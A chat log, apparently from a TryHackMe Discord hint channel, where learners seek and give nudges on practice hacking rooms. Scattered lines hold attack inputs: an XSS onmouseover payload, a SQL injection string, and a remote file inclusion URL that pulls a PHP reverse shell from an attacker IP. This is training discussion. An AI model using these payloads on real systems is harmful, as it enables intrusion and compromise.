#room-hints

Can you try to do it manually by backgrounding the current session and choosing module?

Hey guys , I'm stuck on Task 11 of ZTHWEB2 , any hint ?

I found the api but is doesn't work 😦

NVM ! GOT IT ! 😄

hi can i ask for some help on room ZTH: Obscure Web Vulns / [Section 4 - XXE]: Challenge i tried putting the xxe code example in the request and tryied whit xxe examples from https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE Injection also but i getnothing in burpsuite only reply with "sorry, abc is already registered" any suggestions are appreciated

found it nvm

need a nudge for lazyadmin

Sure. Where are you stuck?

nmap scan shows port 80 and ssh, i gobuster'd port 80 but no intersting finds

Gobuster should show something interesting. Which wordlist did you use?

raft-large-words

use the rockyou wordlist

No, rockyou please. Its not for web dir bust.

was about to say that

ups

lol

will try the classic directory-2.3-medium

It'll show something interesting, I'm sure. 🙂

been switching to raft lately tbh and it was decent

but some rooms depend on the classic one probably

oh gotcha

ty

actually

raft showd that directory

but i have a bad habit of grep'ing for 200 in my gobuster results

Sometimes medium list can't find anything so I try to stick with large one.

Anyone got any idea why is not going through

run that on the box

and put the answer there

i guess

@onyx atlas

@onyx atlas it doesn't ask for the command but just for the variable

Yes, Thank you

hey hi guys i need a help in https://tryhackme.com/room/postexploit

i have completed all , except this

it is between the users

can i PM u to avoid spoilers @white salmon

yes

recovery nudge pls

Hi all - May I ask for some assistance please? I'm a bit stuck on one of the Vulnuniversity questions

Ask your question

I've been following step by step, also looked at some videos - however I can not seem to get intruder query to accept any of the file types in this question

How are you determining accept/reject?

Send screenshot of your burp intruder request

In DM Termack?

Here

and these are the payloads

How are you determining accept/reject?

Sorry ninja - It's good question - as the subject doesnt actrually tell you where to look - I've gone by this

You're looking at the response

Whatever the URL encoding setting is, flip it

Apologies I'm going to be dumb here - what and where sorry 😦

There's a setting for intruder

For URL encoding specific characters

If it's on, turn it off

If it's off, turn it on

Cool - Just looking through the options now

aah

this one?

(just unticked it)

Yea that one

wow... saying I feel stupid is an understatement - that makes sense too 😦

Thanks a bunch Ninja - much appreciated. I was pulling my hair out

hi can i ask a hint for room zthweb2 last task 11 ,i tried to fuzz different parameters with no luck

any suggestions are appreciated

found it nvm

I was completing shodan room, but couldn't solve Task 4 number 5 question, top operating system. Any other way to solve this question? Also, hint wasn't that helpful for me.

Okay, I just solved it. No worries!

hi, i am trying the motunui room and i have wrote a script to bruteforce. But it's running for 2 hours now. Can somone tell me if i am wasting time or not? (the script is based on curl and rockyou.txt wordlist). If i am not clear enought tell me (sorry for the bad eng)

btw i am sure at 80% the script is right, cause i have made some testing before running it

Any brute force on tryhackme will take 5 minutes or less.

i see.. ahahah tnx

can i ask you t review my code (is like 6 line of bash)

I can't as I haven't done the box

uh kk

tnx

Hi all, can someone assist with the crypto1a || layouts ||aspect, I tried to think using crypto mindset and out of the box mindset but still stuck, ||I tried all I have single and thrice as indicated in lowercase||. Thx

What room?

CCT2019

First question of Last task

Rip ok there's not so many people that can help there

I see that @proven bridge has finished it. If you are around 😊

Waiting some help going back to it

Sure, make sure you pay attention to the word ||thrice||

and layout means ⌨️

@white salmon

Someone can tell me one hint to Psycho Break, task 2, question 2 ?

No, because that's a brand new room

Humm

Please wait 72 hours after release

Okay, Thx 😄

either I've drank too much or something seems odd. working on blaster

If it's the history, check the pins in #room-help for the CVE

run nmap, see a number of ports open. answer is NOT what I found with an -sT scna

it's lower than what I get with the sT scan

second, nav to the IP address in my browser and only getting the IIS landing page

there is no other port that has web service running (NMAP to check)

Yeah so 1. Windows is weird with open port numbers

2. What about directory bruteforcing?

ran dirb

nada

Try harder

Different wordlist

Bigger one

k

one of the questions is asking the name of the main web page, though

there isn't one

wait

hang on

LOLZ

never mind

k, off to user a bigger wordlist and lick my wounds for my stupid web title page question

so why is Windows weird on open port numbers? I've not heard that before

It just is™️

Hello, i have been solving Psycho Break room and got stuck on Safeheaven, there are 4 images i did extensive stego upto my knowledge and check src files in source too only i got this on page source Search through me and find it. But i am not able to move forward. Any hints are highly appreciated

Its a new room, so no hints or help is allowed till 72 hours passes.

Finally got the crypto1a and crypto1b flags, working on te last one crypto1c, thx @proven bridge for ||⌨️||

Hello, i don't understand this sentence "Split by comma and get the last element in the split"

can just somebody help me

split the text in the file by ,

and then the last thing in the split will be the flag

Hey guys, I need a hint for the ccpentesting room. Anyone mind being DM'ed?

You can ask here someone will respond, anyways you can dm me:)

So I'm stuck at task 24 of the ccpentesting room. I've done the directory scan and found the secret directory but the files I find are forbidden files like .htaccess and .htpasswd, plus an empty index.html file. Are these the ones or there are others to find? Which wordlists would be best to use in this case to find them?

Any standard wordlist would have found that directory.....you can try
/usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt

@shut lion

@eternal brook alright, let me try again.

thanks

hello guys

i'm doing the owasp top 10

and i am trying to do the extra challenge of day 3

i found the email

and i got this

Hi,
Signups for the beta test of the senseandsensitivity program are now closed -- thank you to everyone who applied.
This also means that the subcode has unfortunately already been claimed.

does this mean that there is no more extra challenge

or should i try harder

You can't get the code anymore.

oh , okay

thank you very much

Room XSS Playgound, task 8, #4: Why does the following answer works, but yields no flag? ||<img src="abc" onmouseover=alert(String.fromCharCode(72,101,108,108,111))>||

No hints or helped allow for new rooms till 72 hours passes.

Hello in XSS playground room task5 i got document cookie with alert also i changed background but i didnt get any flag should i do something different or its bugged any hint?

Try and look at inspect element

tbh i dont know what i did different but i got flag at the first one

still can not get flag at the 2nd one im giving img src, and hover event i can change background colour to red

in this channel only questions about tryhackme rooms. Try #general

dont ask such things ,this is something which requires a concent letter and other formalities,one cant simply go to any sites and just attempt even if it is your own

in this channel only questions about tryhackme rooms. Try #general
@white salmon its trykhackme room as i said at the top

Wasn't directed at you

oh sorry then

it was for the person who just deleted his msg @fathom mortar

I am looking at room - Psycho Break - And i am currently stuck at decoding a piece of text to get the key to map , can anyone drop a hint which decoding method used.... I tried most of them - base64,rot13 rot 11 etc

Never mind got it

@tepid solar Please wait 3 days after release before asking for help

hey hi team , i have rooted , JACK now , but i am confused y the information is not available in the perfect file https://tryhackme.com/room/jack

easy root , i have not faced an issue like this

please ping me

In the.... Perfect file?

sorry that will reveal the answer

can i PM u

You can use the spoiler tags if you are worried about revealing answers

OH

okay

for the ||cronjob , i will check for the /etc/crontab , but here there is nothing shows in that but after running the PSPY i have came to know thereis an cronjob running|| @stuck fractal

Yes

is this any BUG ?

||System wide crontab is separate from individual users' crontabs. It's a security feature, not a bug. Root had their own private crontab.||

Not a bug.

oh nice thanks

u made a day

thanks again

I am feeling really stupid and having trouble clearing Learn Linux room

and ...

Do you have a question ?

...

This is called room hints, is it not

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Thanks

I am at the last task trying to get the flag, I have tried chmods greps and finds for anything that looks like root, and tried creating links to the file I need to get to.

You need to become root

You won't be able to get the flag unless you are root

Oh

The flow of the room was to get the pw for the next user, so I was assuming the PW was in root.txt. Thanks.

The flag is in root.txt, which is what you need to put in to TryHackMe

Gotcha, now I feel dumber lol

Don't beat yourself up over it

Thank you!

I got it thanks guys! (although not sure why the pw was in that file to begin with other than for learning purposes) haha

i got question

What term can we use to look for login pages?

google dorking btw

tried inline, inurl attributes, none seems to work

Are you using the right parameter with the term

Also, it's none of the above

im using login

as parameter

im googling 15 min already o.o

We usually don't help on research-based rooms

oh aight, didnt kno

w

i just solved it

nevermind

Did the session just die randomly?

I am working on the metasploit room, and the steps say to run the commands sessions and jobs. Does that screenshot show the exploit works?

No it timed out, but I was trying to run the sessions and jobs command while it was running, but couldnt figure out what to do next (tried opening a new terminal and a new msfconsole but nothing was in sessions or jobs)

If you type exploit -j it will run as a job but it will become a session when you get a connection, does that make sense?

And it says the session died so there will not be a session as it died.

Oh run -j

the meterpreter > prompt means the session was opened correctly. You are able to type commands

Nice

So running the exploit command, I wouldn't be able to see jobs and sessions as they are run though

You should be able to see the session

The job will be changed into a session

Hey guys, Im new at this

And I've been stoped for almost 2 hours with and "easy" question

Can you give me a hint? hehe

From the info you've given us? definitely not

I was just asking if any one was here to help me xd

The worst of it

is that is not a CFT or something

There are always people here, but you gotta directly ask your question

Okay, sorry

As long as it's a room on TryHackMe

Is a question in a Section of the CC: Pen Testing

If i dont have to ask that here i'll leave it xD

Just ask!

Task 8 [Section 3- Metasploit] the #8

I'm stucked here because I can't find it

It?

I mean I read all the options of the payload, of the module

And I cant find it

Or maybe I just dont understand the question

What option sets the payload to be sent to the target machine?

YES

I just need a hint

Something like EternalBlue is an exploit, it delivers a payload

There's an option to set what payload you deliver

It's a research question TBH

Do some googling

I've done it trust me

So the question is about changing the payload?

metasploit how to set payload

easy

It's literally "what option do you use to set the payload"

Okay im dumb, I was searching in the options of the pàyload

Sorry, Im not english and there are some things that I can missunderstood

Thanks James! And sorry for wasting your time

use google translate if you need to

It's not a waste of time if you learned something

Forgive me for being a mess, I always complicate my life unnecessarily. I got it now

Hello. New to this. I am working on Blue/Task 3 Escalate/Step #4 Run!
I continue to get a Post failed error. I have re-worked the room to this point and continue to get the same error.
I have read through many of the walkthrough guides and none address this. Thank you for any/all assistance!

@pine vale You already had a meterpreter

You cannot convert a meterpreter into a meterpreter

Hmmm. Thanks. I guess the status was not clear to me.

msf has changed the default shell for that exploit since the room came out

When I first saw meterpreter > I was confused. pwd showed C:\Windows\system32, so I thought I was on track. But if Task 2 gets you there, then what is the aim of Task 3?

msf has changed the default shell for that exploit since the room came out
@final mortar

It used to give you a standard shell, it now gives you a meterpreter

Ah. So the Task steps are out of synch with msf? That makes sense. I appreciate this forum and the help!

No, the room just hasn't been updated

MSF isn't reliable, at all

Super unstable

Thanks.

damn year of the pig... no wonder there aren't anyone with initial flag. this will take more than 1 hour to even get into the dang thing

i mean... even writing a custom script to do this on the thm kali box and making it use all its threads possible... you sneaky sneaky devil you

@inland onyx can i send you a screen cap?

Yes, you can 🙂

I've been bruteforcing it for 2h now...

@inland onyx If its not gonna be bruteforce I'm gonna whoop ur ass

Haha. That hint, for the record, means that if it takes more than two minutes then something has gone wrong

😠

it went thorul cewl and THE hint

and nothing 😢

Missing something still, perhaps then 😛

On the learn linux room I can not ssh into the server using username shiba1. I have a macbook can not download putty so I tried through terminal. Anybody have this issue?

@white salmon What happens when you try?

it says permission denied

What's the full error message?

permission denied. please try again

Permission denied (public key)?

Try 3 times.

Then screenshot the error message

Permission denied (publickey,password).

Ok, and you're typing the password shiba1 when prompted for a password?

yes

Where did you get the IP that you're using?

You need to deploy the machine in the room, not the attackbox

under my machine

The machine that you deploy in the room is separate from the attackbox

oh

The room emphasises this in 3 different places

how do you deploy in the room? There is no button to deploy in this one

There is

Make sure you're looking at the right task

It just says start attackbox

Machines are attached to tasks

Not to rooms

Look at the tasks below the video.

got it. I appreciate the help. I am new to this

@white salmon new is best... means you care and want to learn and have a passion or hunger to explore as opposed to oldschool grumpy assholes . (no offense to oldschool grumpy assholes present)

I find this very interesting but hard at the same time

its a journey

i remember popping my first shell and being liek woh... what!?

On the VulnUniversity room, I can't seem to get the check to work

I have the right answer, but I am more concerned about wondering why it is showing the error "extension not accepted"

Check payload encoding

If it's on, turn it off and vice versa

gasp

thankyouthankyouthankyou

I can never remember which way it needs to be set

Just that one of them works and one of them doesn't

It throws me off that this is a free room but the pre-req room of burp suite is not

;_;

There's portswigger academy. Don't limit yourself to just THM.

I will check it out! Prior to THM, I had only intercepted requests and just changed params- so this is really all fun in a whole new world

guys

wrong password?

You do get a free in-browser machine with this room, use that @livid vault

blank access in browser

haha

what password for ssh this challenge

Try Accessing in Browser @livid vault

cant be used

same @final mortar

Not Attack Box

This machine

Try This Green Access in Browser if isn't loading up properly

same

Same what

It comes pre logged in

i am stuck on psycho break room on the keeper key.....i did some stego tools but nothing came up ....can anyone give me some hints

hey need help on : https://tryhackme.com/room/networkservices. Task 3 #6, i don't kow where i'm supposed to search 🙂

It is in your enum4linux results

any one on Year of the Pig, just for a sanity check

Yes, @cedar coral

can i DM bro?

Yep, np

Hi, I got a question about Year of the Pig, anybody able to help?

Rule 13 states we cannot help you for 72 hours unless instructed otherwise by the room creator

I haven’t checked the room but if it’s a challenge room we can’t help.

no problem,

Hello guys!

For the room WWBuddy how do I properly add the passwords to change into pay load?

' or 1=1 -- a

hey guy soo can someone tell me hint on agent sudo room

I discovered that the secret site is a user-agent but I have no idea how I can access it 😐

is YoTP a new version of yotf?

No. They're both part of the same series

yotf was crazy fun

There are lots of them -- some still private

Two more waiting for release. Three more planned

I discovered that the secret site is a user-agent but I have no idea how I can access it 😐
@paper sapphire anyone help 😐

Try using different user agents according to the naming scheme you see on the webpage.....

Muirland: I thoroughly enjoyed yotf... You have a knack for good challenge rooms 🙂

hey hi guys , i have ROOTED https://tryhackme.com/room/ice but i cant dump the ADMIN hash ?

can anyone he,p me in this

Show us what happens?

i am really stuck on Psycho Break room at step that needed to decode text for map key. i already tried ceaser, rot or shift but none of them work. is there anybody can give me a hint

Intsall Ciphey

thx a lot

On the Learn Linux room i've tried everything I can think of to access /root/root.txt for the final task, I feel like I'm missing something obvious...any hints? Sorry I'm new

Show us what happens?
@stuck fractal i have got the Nt/authority

but i dont know , same user Y it is enabling the SeDebugPrivilege Debug programs Enabled

and in other it is telling like SeDebugPrivilege Debug programs disabled

@celest imp Thats a brand new room so please don't ask for help yet. Give it 72 hours from release

i have got the shell as DARK , in windows i have tried to dump , sut i cant becasue SeDebugPrivilege is disabled

but i have used some msfmodule , that throws the same user with SeDebugPrivilege is ENABLED

i am confused here

You need to be system

Then you need to migrate to a system process.

after using the ps also it is not showing the nt/authority process

i dont know how windows/local/bypassuac_eventvwr this enables the SeDebugPrivilege (so i can take the hash fromthe mimikatz)

Golden Eye Room: Task 2: 3rd Question: Inspect port 55007, what services is configured to use this port?
I have done nmap scan for this port and pop3 is running. But I'm not able to figure the answer.

on the anonymous playground room, got the funky looking code and im guessing its some sort of cipher as the hint says 'zA' = 'a' but im not too sure what to do with it

You have to create a Python script for it to be decoded

yeah but im not too sure how'd it work

i see the 'a's in it line up with the username magna so i might be able to get the hE and the m for example to figure out this

aight i figured it out

its a damn smart cipher tho ill say

Yea it is I got stuck on it for a long time

im stuck on Task 2 Question 4 Psycho Break Room, can someone give me an advice?

Please wait a little longer

72 hours from release

ok

Hi, i'm doing the "Psycho Break" room and i'm on the page where you have to escape Laura. Can someone give me a nudge?

Please wait a little longer

Hi, i'm doing the "Psycho Break" room and i'm on the page where you have to escape Laura. Can someone give me a nudge?
@red minnow oh man I'm stuck there too... Really don't know what to do..

I'm stuck with that too

lol seems to be a fun ride ahead .... i am stuck at the keepers key. Tried lots of stego stuff, but to no success, so really curious what i am missing 😆

72 hours should be over now 🤔

Indeed it is

g,

Help/Hints about this room (in the respective channels) are okay now

A hint for the keepers key from my side.. It's not about the picutes on the site

@true prairie yeah I guesses so to, bc i tried everything on them. i was skimming through the JS files too :-/... can I DM u ?

@true prairie yeah I guesses so to, bc i tried everything on them. i was skimming through the JS files too :-/... can I DM u ?
@ivory plinth yeah of course no problem :)

Any hints for Psycho Break Task 2 Question 4? Can't escape Laura...

Same here ... @true prairie since last night .. Lol..

Just not giving up on it. Trying and trying and trying. But no luck so far.

Just not giving up on it. Trying and trying and trying. But no luck so far.
@cerulean sky yeah and I tried the weirdest things.. No success

Even looked up some gameplay videos on YouTube on what to do when encountering Laura

Hahahaha I did too..

Even looked up some gameplay videos on YouTube on what to do when encountering Laura
@true prairie i read the whole wiki 😆

@true prairie i read the whole wiki 😆
@grave rain yeah I went to the Wiki link below and thought: hmm well maybe I'll find something useful in here...

Same here guys.. I think I tried countless times to get past the task .. But it is kinda tricky... Yet i like the challenge.. The creator has made a quite a well-thought room..

I read the wiki page .. All of it ..

Same here guys.. I think I tried countless times to get past the task .. But it is kinda tricky... Yet i like the challenge.. The creator has made a quite a well-thought room..
@cerulean sky oh yeah! Overall until now an awesome room and very dynamic

Other than getting a clue I was more tempted to start playing the game on my PS.. I had it since 2017, never played but didn't know I will want to play the game due to a CTF machine I will get stuck in 2020.. Lol ..

Theres really a blurred line between a very well thought room and a random room

Fo' sure

True indeed. The harder we try the better the room actually is .. The motive is to keep trying and get the box done leaving you with learning something new.. I think it's all about the journey to being a good cyber/infosec guy

How do you think it falls? @grave rain between the "very well thought" and a "random room"?

It depends on how you see it i guess

Right now im stuck

So for me its random for now

When an answer pops up.. ill be like damn it was well thought

Even blurrier line in judging lols

Okay - that makes sense

We're (i) debating on changing he difficulty rating so I'm just trying to collect communal thoughts

It definitely not an 'easy walkthrough' room haha

I am surprised that Psycho break is classified as easy ctf room .. I am sure it isn't easy box but definately medium..

Granted our new rules for room testing / review would clasify that room differently but

When an answer pops up.. ill be like damn it was well thought
@grave rain Yeah but right now I don't know what to think. Maybe the answer is so simple yet so obvious. The room was a blast till this point. Now it's a bit of a bummer..

I'm using the "old" rules for when that was submitted and reviewed

Okay, thanks y'all

I'm stuck on task 3 btw 😉

You give us hope man

Oh.. wow you went past task 2.. awesome.. keep going..

I want to gather a community view/opinion before changing the difficulty rating as it's very subjective so

It looks easy if you know the solutions ngl

Very much ahaha

Just directory bruteforcing and basic command injection

It's that little click in the brain y'know?

aaah it makes sense but it's stupid

xD

But the little click makes all the difference

Hermit mode

For surea hehe

Good luck!

You too luls

I'm just keeping my ears for how others find it alongside the rare time I get to try it

May the force be with ya'all..BREAKING THE PSYCHO..

So it's good to hear for me especially (:

When someone whos more pro in this field is stuck with you

Its better for us to hear haha

Makes us feel less nooby

LMAO I'm qualified in a different type of forensics but this is close enough xD

For sure

Atleast not medical field hahaha

Keep on at it folks! I'm dragging on behind with you all ❤️

https://tenor.com/view/joseph-oda-pick-myself-up-piece-by-piece-the-evil-within-jojo-tew-gif-9592510

Atleast not medical field hahaha
@grave rain Ahaha well, saying that 😛

You'd be surprised

Try me haha

Idk where antihypertensives fit in any of this

I'm a HCP in the UK

Wuw

Im in india

That ain't a d*rk swing but

Same profession technically

Infosec attracts a very wide personality 😛

Im in UK too..

Its one of those subjects which is 100 percent self learn yk

You cant learn stuff like medicine self learn

heheh somewhat 😛

I've been through plenty of exams for it

I mean who would even self learn medicine hahaha

I only picked it up because my patience/knowlege of infosec was less at Uni lmao

I don't think you will be taken serious if you say you learned medicine by yourself

I didnt hear of infosec then

Kinda dumb

Not at all (:

Very different skillsets

Medical you take fact as fact

I only picked it up because my patience/knowlege of infosec was less at Uni lmao
@steady stratus
This is weird haha

Infosec - you don't

But medicine has its share of plot twists lol

Hehee ain't it just huh @grave rain

@steady stratus id like to PM you something about nhs if thats fine by you

gtg.. Nice talking to ya all.. First time on Discord and its indeed a lot of fun to be here among so many like-minded people.. The community is awesome.. We surely come back !! See ya' guy.. Break the psycho or become one ... Lol ..

Sure, go for it @grave rain (:

Thanks @cerulean sky! Best of luck with it all .... until the next time!

Until next time.. Sure.. !! 🙂

Hi guyz

Can I get a hint about the FTP passwd? on the psychobreak room

i think i might have overwritten the Learn Linux room Task 21 environment variable, any help getting back on track

Redeploy the machine

When you redeploy you get a fresh machine without the modifications you made

Hints already allowed for Psycho Room?

hey @white salmonyone!
I'm doing the SQL Injection room, on task 7, and I'm having a really bad time trying to find the database's name
Can someone give me a hint? there's no write up for this room yet ...

I just want to wonder what am i missing on Task 2 Quest 4 xd

anyone?

Search "query to select database name SQL"

Also, dont tag everyone, It doesnt work anyway and you Tagged poor ever instead :(

nervermind!

I got it!

@woven mirage im sorry

it was my mistake!

poor ever xd

No problem

can I share how I did solve it here?

Actually, this Channel is for hints so people are not supposed to post answers

I was not going to give the answer

but ok ..

Psycho Room Task 2 Question 4 (How to escape Laura), any hint?

Can anyone give me a hint on Psycho Break task 2 question 4 (escape Laura)?

i think i know how to do it but miss something to complete it :/

lol, at once xD

xd

i think i know how to do it but miss something to complete it :/
@soft fulcrum I'm stuck at it for 2 days and I don't have a clue how to do it

yeah me too, i just have a thought but can be completely wrong

I'm also stuck on Psycho Break, Task 2 Q4..
I can view contents of actual dir but all other commands tried are blocked..

Tried a lot to get past it. But no luck so far guys. Keep grinding. The hint is the keyword in the source code is the parameter and you can only run your most typed command , nothing else is permitted. Thats all so far.. Lol.. 🙂

has anyone done manual SQLi on uopeasy? trying to avoid sqlmap & need a nudge

Room - Common Linux Privsec

query -

Task 4 : enumeration

How many available shells are there on the system?

I ran grep '^[^#]' /etc/shells

It gave me these

/bin/bash
/bin/rbash
/bin/dash
/usr/bin/tmux
/usr/bin/screen
/bin/zsh
/usr/bin/zsh
/usr/bin/pwsh
/opt/microsoft/powershell/7/pwsh

totals to 10 in count

but the answer format is of single integer input

😕

Hey folks, working on the Advent room, and I feel like I should be able to actually find the page for the first box but it keeps timing out. My Openvpn is running. I have Burp Suite open and Intercept off. I can get to places like Hotmail....but not the machine that I deployed.

THoughts?

!multivpn

!vpnscript

@stone oyster

chika..

thx

can i get hint for pyschobreak room task2 question3?

but the answer format is of single integer input
@noble locust If you're still stuck try reading out only the /etc/shells file

Can I get a hint about the FTP passwd? on the psychobreak room
@somber crag The FTP username and password should be in the same file...

Can anyone help me for Psycho Break Task 2 Question 3

any hint for psycho break escape laura?

Can anyone help me for Psycho Break Task 2 Question 3
@maiden violet Focus on enumerating the safe place :)

any hint for psycho break escape laura?
@stuck pendant I think a good hint is to imagine running away from her with the help of system known commands

im stucked with keepers key in psychobreak room

any hints ??

trying this lab
got stuck at what is the username of a logged on user?
i trided bruteforcing using dirsearch gobuster
but the username didnt came in the result
anyone?

https://tryhackme.com/room/webappsec101

hello Guys,
I m stuck in the Psycho Break, where you have to decrypt a piece of text (task2.2)
I tried some bases, rot, ceasar, vigener,... I cant get it.
some hints? thx

@clear creek Hint: cipher

@red minnow thx I ll try some of them

hello Guys,
I m stuck in the Psycho Break, where you have to decrypt a piece of text (task2.2)
I tried some bases, rot, ceasar, vigener,... I cant get it.
some hints? thx
@clear creek altbash cipher

@white salmon yep found it. I never heard of it till now ^^

@white salmon dont give the direct answer let people try thats where they learn

Hello i'm in the linux challenge room task 4

"Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code."

and i don't know why it doesn't work

(i'm with the good user for this operation (garry))

Can somebody help me? Thanks

try nano ?

Nop it's a C program

can't read it like this*

strings then

Strings??*

strings file.c

Nop it's a C program
@white salmon for the record gedit wouldn’t have worked either it would’ve looked the same as that nano output

Aw thanks

i'm try to used strings

but

Hello, guys I have a little problem to solve the skynet room 😄 I am trying to get back reverse php shell with the command : http://10.10.165.12/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.167.48/revShell.php, but I just get reverse shell from my machine to my machine 😄

Thanks you @red minnow strings work

hey am doing psycho break and stuck on "i am having a terrible nightmare statement" can anyone give me a hint??

@trail pebble sure, pm me

sry

@trail pebble sure, pm me
@red minnow gimme hint too

@sullen glen check your dm buddy

can't wait to see the walkthroughs on 'Year of the Pig'

just wrote my first python script with concurrency

🤘

Can someone share some hint for crypto1c from cct2019? Im out of ideas 😭

On the Mr. Robot CTF box, for Key 2 there is a hint that says "white-colored font". I already got Key 2, but I did not understand the relevance of that hint since it did not involve white-font? I also checked the included write-ups with the box, and they all seemed to use a similar process I did. Would anyone be able to clarify what that meant?

can someone give a hint on 'i am having a terrible nightmare statement' in psycho break room

can someone give a hint on 'i am having a terrible nightmare statement' in psycho break room
@echo salmon bruteforce

any help to Escape Laura? Psycho Break Room

Need help to escape Laura also please :)

need help in Break Room (terrible nightmare)

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Are you able to type dir

Please mark that as a spoiler or remove the passwords

ow sorry

Will do it the next time

You'll have to do it now

Just for the people who haven't completed the room

Okey i will delete it

@trim haven I will try to dir

You'll have to do it now
@trim haven Sorry I hope this didn't seem commanding, I meant it in a different way :(

No problem, i understand your point 🙂

Hint for Task 2 Quest 4 Psycho Break Room pls

@trim haven dir also doesn't work

It seems like there is something wrong with your smbclient

I am getting these error message when i execute any command

NT_STATUS_INVALID_INFO_CLASS listing *

On the Mr. Robot CTF box, for Key 2 there is a hint that says "white-colored font". I already got Key 2, but I did not understand the relevance of that hint since it did not involve white-font? I also checked the included write-ups with the box, and they all seemed to use a similar process I did. Would anyone be able to clarify what that meant?
@spiral yew

yes the thing u should know is written on that web page but the trick is fontcolor is white and the background too so u can't see that

Hmm, I solved the whole box without that. I will go back and look around.

there are obv multiple ways to get same data

Task 2 Quest 4 Psycho Break Room Escape Laura - is ||pkill|| a rabbit hole, spent all day on this and can only list the directory, no other commands seems to work - Would really welcome a hint on this one.

need a hint for psycho break
am at task 5 sshing the user found in previous task....
just want to know is the password in rockyou ??

@gray garden same for me

Task 2 Quest 4 Psycho Break Room Escape Laura - is ||pkill|| a rabbit hole, spent all day on this and can only list the directory, no other commands seems to work - Would really welcome a hint on this one.
@gray garden
do you get the web shell format ?

need a hint for psycho break
am at task 5 sshing the user found in previous task....
just want to know is the password in rockyou ??
@trail pebble if you're brute forcing for more than 5 minutes, then you shouldn't be brute forcing

That's the rule here for box creators

@gray garden
do you get the web shell format ?
@trail pebble yes

@trail pebble if you're brute forcing for more than 5 minutes, then you shouldn't be brute forcing
@stuck fractal
more than half an hour

@trail pebble yes
@gray garden
try listing contents of previous directory

Then you probably shouldn't be brute forcing.

The rule is 5 minutes.

can you tell me the general limit for no of works coz my pc gets reqs like 200 tries/min

There isn't one

It's based on time

30 minutes is definitely too long.

@gray garden
try listing contents of previous directory
@trail pebble Thanks for the hint, but I must be missing a trick here somewhere:-)

@trail pebble Thanks for the hint, but I must be missing a trick here somewhere:-)
@gray garden
can u list current directory ??

@gray garden
can u list current directory ??
@trail pebble Yes, no problem there

results will reflect in the same page

results will reflect in the same page
@trail pebble As soon as I extend ls /[DIRECTORY], I get a 'Command not found'

you are very close my friend

just remember relative path can be useful too sometimes

just remember relative path can be useful too sometimes
@trail pebble 🙂 I have it, thank you for your help, that is one hell of a string I need to decode

the joy is the price for struggle

Stuck on Blue room, following the guide but I can't get past task 2. I've checked LHOST and RHOSTS to make sure they're set correctly, but the exploit completes without creating sessions

Previously have done the Nmap and Metasploit rooms, believe I have everything set properly

I am on blue room too, but I think I found an inconsistency rather than an issue

Stuck on Blue room, following the guide but I can't get past task 2. I've checked LHOST and RHOSTS to make sure they're set correctly, but the exploit completes without creating sessions
@graceful valley run the options command and see if you are missing anything

@flint lintel Double checked all my vars, they seem all to be set correctly. Was able to connect after several tries, I'm attributing my problems to "This can occasionally fail, try running it a couple times" - found in the writeup

I was also running into the same issues, but the PAYLOAD wasn't set right

Blue exploit is not prefect. It can not work sometimes, It can auto bork after a couple failed tries

I don't even have a PAYLOAD option in my options list

it won't show there

you have to type get PAYLOAD

oh... well... that might be my next problem

I had to set it with meterpreter/reverse_tcp

it won't show there
@flint lintel It will if it has failed atleast once

@graceful valley Screenshot your options please

I'm giving up on it for the day, my brain is cooked

My issue is that I immediately get a meterpreter shell, when the rest of the tasks guide me through upgrading a regular shell to meterpreter

Screenshot of my options

I also got dumped right into the meterpreter shell

Metasploit now gives you a meterepreter shell directly @flint lintel It's just how it is now. You can skip the shell_to_metrepreter part

Metasploit now gives you a meterepreter shell directly @flint lintel It's just how it is now. You can skip the shell_to_metrepreter part
@final mortar ah awesome, thanks

I also got dumped right into the meterpreter shell
@graceful valley Which is all right 🙂 Skip the conversion part in practical, but read through it

Screenshot of my options
@graceful valley So this works then. Right ?

It did work, at least twice, though I run out of time, my machine expires, IRL gets in the way, and when I come back to it the struggle starts over

I'm going to take a break from it for the night, maybe read the writeup over and try again tomorrow

It did work, at least twice, though I run out of time, my machine expires, IRL gets in the way, and when I come back to it the struggle starts over
@graceful valley once you repeat the process a few times, its pretty quick. I can get it down to sub-minute

@flint lintel Yeah, I was getting pretty quick at the metasploit room

@flint lintel @final mortar Thanks for the help 🙂

@flint lintel @final mortar Thanks for the help 🙂
@graceful valley all good!

I need help in psycho break room with task 2 q3 "The keeper's key" where I get 4 images. I tried a lot of stego techniques but none worked. Anyone pls throw some hint.

||"I think I'm having a terrible nightmare. Search through me and find it "|| help me in this

need a little help in Year of the Pig room foothold?

need a little help in Year of the Pig room foothold?
@pale slate New Room give it some time

Cap-L3v1 read the next question in the task for a hint maybe ?

Need a hint for task 2 questions 3 in psycho break, i think i got the nightmare but how to make it usable.

Any hint for me @drowsy sequoia . I'm stuck on the same task.

Any hint for me @drowsy sequoia . I'm stuck on the same task.
@vast wagon sometimes what looks is the way is not the way you'll have to do a bit of digging on the other. Sidee.

Hope my hint gives you a source to start👍

Hey

Any hints for the next step.please

So in YOTP. I have enumerated what appears to be a login page. embedded into that page is some strings .. ive had partial luck decoding this, I can get it back to plain english where i see things like "credentials" and a hell of an api fetch query. But I have found nothing on this site matches the constraints of what the page is asking for. What technique do i use from here, or Am i barking up the wrong tree.

Is this a "Feed it one pig, feed it two pigs, feed it -1 pigs" situation?

@fleet pike hints and help are allowed after 72 hours from release of the room.

Need a hint for task 2 questions 3 in psycho break, i think i got the nightmare but how to make it usable.
@drowsy sequoia here please😂

I need help in psycho break room with task 2 q3 "The keeper's key" where I get 4 images. I tried a lot of stego techniques but none worked. Anyone pls throw some hint.
@vast wagon not about images

have someone time for Psycho Break help?

depends where you re in ^^

Task 2 #4, Laura...

look at the source code

i find ||"shell"||

yep maybe you can use it some where you can write in it

hey hi team , how to check for the sedebug status here

have someone time for Psycho Break help?
@solar scroll ahah I'm stuck at Task2 #3

